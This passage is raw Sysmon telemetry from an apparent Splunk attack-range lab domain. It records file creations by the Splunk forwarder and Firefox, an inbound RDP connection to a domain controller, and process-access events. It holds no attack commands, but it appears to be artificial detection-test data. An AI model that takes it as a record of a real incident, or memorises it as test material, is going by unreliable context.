Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486B13F5EBF1C78FB02C157E04AA08B7,SHA256=D1E3FC144D608D7FB2587948E653B8C6EBFE486FC9A3A3E54AD1D4D0E2C31049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:38.467{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6762C01EC88FDA027FDE0F2BB134F93A,SHA256=6F1AF35BA248CBEC320A27BB9B3C930BD379ADED454B4D5AF8ECB50D04E0CB02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:39.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=179DF52F9E21880A083251D092C1DC1B,SHA256=4FD04F4531B755CD44CA6F12E97CB9FD4FBAFF4F978D5DC39D6C3A1397DE6A32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:39.048{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15295900882C9FDA0B481EAD935BE25E,SHA256=0C84A6941B26C086C160E2058662BA9D0D35E9C98D07E5A94218646F49232347,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:30.735{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50942-false10.0.1.12-8000- 23542300x80000000000000001046713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:40.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD0FD8CF073C4CA3CEB147F5BAFA128,SHA256=C6FCA232657D25BF8EC2F0125CBCE7BCA2BF8B3DD9BFD53029E1628AFA955DD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:40.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2C03B5B17EBED396603BD2ED76D114,SHA256=1325AF5EEF1B2723B4FB82D2F851B61D97112456102564864FD88B2410874874,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:41.849{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E83B85ABEAA7D9332E7719E5EA52E9D,SHA256=23CCF2714EAEA146E0CA35D997F209A4790F1509890A0704EC65C1C61A01BCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:41.127{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AB1E956AB952BA951ABDD9601BDC68A,SHA256=185654CEED088D4A1D6805C4BE954AF6FDB1B3FC75F64F1CE2C7246055C2F79D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:42.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14AFCA112E783126F2E30DF5B816C764,SHA256=DF37F47FB3493CC97806FC4786E96827224E68312DE350435E13E5C78FB7CD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:42.170{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB33D5F0A3D7C7CB7E1DCBDA194AB962,SHA256=F86D63156B19C16CEA5FCB377DBEDAE21BF4CF52CA0544B752619E58650C87B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:43.865{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FE388E0CD30B5D8E255F54718C102A0,SHA256=8BF4358575D8CC5C6B78E2820ED9AA0805C1D4BAC437B725B416578F7A1779F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:42.397{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57192-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:43.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70A837AFA9BCE79D63F4218D563EB3D3,SHA256=4BBF1AE1387BBED58E80003B9F67A666BA7495D63D498980AD0C37C7376FA3C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4272C45CBC2BD65D328A6F6784C6DD7D,SHA256=371F50472C7D9B9E858C2B155FFD6D64FC7FCE92C5A9A1628D9538948DDAA395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9157EF08F5618D8BE42A815D647BD25C,SHA256=FDD4506C3350659944955BAAAFB5AC985C888AA1923F55C94884D951C99ED656,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:44.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99447ADC2CC6F63E41C646BCEA0EADA2,SHA256=E7400B31D2C5C76AB2C20CA5ECC10C851A91F320EFBCA803555B41F1016E391C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:44.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D109231B84A8F1FC507B35B275CF5248,SHA256=61D6766ECFD3F8374EBFC7D8CA860C307B04390A906B55B6E769FA83556C264E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:35.786{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50943-false10.0.1.12-8000- 23542300x80000000000000001046733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78FD72A7703E5F7A1A3B60A7752CD393,SHA256=3C192C5DF6A3F6A45CEC055E78A63C74C16D813B7070AC17930C2142C1CC3FA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:45.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C285CDAF8DE9ACA27C3AD4E4883FCA7,SHA256=2C54D09EEC9E325860BBE39B1C9EACED880ACB042286DB7A6907A537EDCBF9BC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:37.096{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50062-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001046731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AEE892DFEF9DEE839318FF15CC4577B4,SHA256=8EE4797C5CA70284B8C9AA89ED7F332FC630FD393657DD7BB19FCD815BCB6FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F22DFEE6F0ABD0CFB3C3600DE1E9779D,SHA256=DF2A7BD8F177A3E693ED3A347F538906568C71BA87CFA71E9CDA8EDDBED18E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.048{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C5B1FEFBC274B5DBDB6DF52406C9F523,SHA256=C08BE258D1A71EA401793C4087C377B0421425308417785E300E741AF7B173DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=655448F0629020965BD726845F3CBF27,SHA256=66967BCDD77CB9F12B22E8192371A20147B82114E07E558BF3C6C4B3A554EC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0E615B92F67F25D5C6BA0BC0B0127149,SHA256=933180266DA365E71BF2ED8B714D4D3B815FFE7899D6DE556D568A0794913A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AF76039D34F57B04C12E05A91DA8C8D2,SHA256=27CF0E2AC838F178F6C18346BBDBD4B68728A808F02846A872F7AB09A930282B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=08F4DADC170013E929830916033C8D95,SHA256=6900E202527C9B3C9D6DE42219021FB241491A42C149DCECA86D23FB390EEFA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B5D38A45F37FF8B9A01BF64B0D5FB120,SHA256=CB929E4F7A44A8AEE875D0AA60ED8A6B20CE9B2ED9117879A74DCB01FDBD7DA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=192D4BCB9224891C9C2EC4E0775C8525,SHA256=97FA256B8D40C8D7E248D4E2E6F9A3BA1E39AC913B5FB20789FD225EF406012F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB6BCC0341238F249AA41C095D405097,SHA256=1D41BDA416DB780814591B2F0A4A1B13A4C58E9BE8C2F1BBC168E8A1F77C9449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:45.032{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3B3A806C40B0E8B69BBB91CE6BEA5D9E,SHA256=9E0B5C4423469A1B92606B5FD1C3F7DA19E92691841237CC3A731DB3B8FC697F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:46.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E8E11C1E43CEA347DDA5BBD3898CD3,SHA256=544B5F3E28EBD526C32A9DDC7121D4C607C97B35E48249C51A5DE1AE54A99E59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:46.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27CDDB46391E5BC3D4B40F8487E5634A,SHA256=12F71137843F02593F0E1D1D79125A1DD92D3C8C9175F4FB0FEB738BABEF80D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:47.931{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843158182DCDCE96EA905A65CEC21F4F,SHA256=A1DA03C43838ADA0F62B3488FB408C4935CCC6F417CC44F6E67B564EA4F5802D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:47.297{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527B4864073F8880021E1E0C2E48371F,SHA256=0513BB660CBCCA8C960FD5C1479B0D5188CF51FBBF1BCF993D71F68C3E9D118B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:48.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C4775582B5D4FC4BCDC6325A7C036E,SHA256=7309D5A9274BCC628C4278D9FEDCBE61AA4DA8BDF322C9C0E38D320293B59662,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:48.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D476205BF21604285EFCB94457922D,SHA256=2D5683285C9A3C7FB1F3A340E57DC87EF67C194D8C7A3F59EAC57AFF68B9EE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8550D4F4A3D38C99F41D1BF04EF005FE,SHA256=F789B96E6D841DF6F93783ABB660AA38D7D992858066FC386624623634796D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:49.344{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F535844F2BF8922149808CC749A888F9,SHA256=48AF53D4A4309A0ABF1FEC947A06330AC89BACAB58FC1F8AB184D6F10F2C0002,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:41.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50944-false10.0.1.12-8000- 23542300x80000000000000001046758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC07BC5A824158CDEC92C0969A001F0,SHA256=1A3BF0849F747147D77E2C47913966A1288B1FA769953A38D07A398C4F60738F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA5FF9CA51531DCDAB896B4EBC01FE12,SHA256=D6B923BF662BF19A5243172BE48C25B4942ACF617245B6ECD3CF70F574EDFA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4272C45CBC2BD65D328A6F6784C6DD7D,SHA256=371F50472C7D9B9E858C2B155FFD6D64FC7FCE92C5A9A1628D9538948DDAA395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:50.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD29CEE3D25A66B7B91AD3FBF0CF0B60,SHA256=A2C78AE5A2D3C27F19D7DDABE828F1837FEBEA5AE03D96404E9C9426A4BD0E6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.896{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 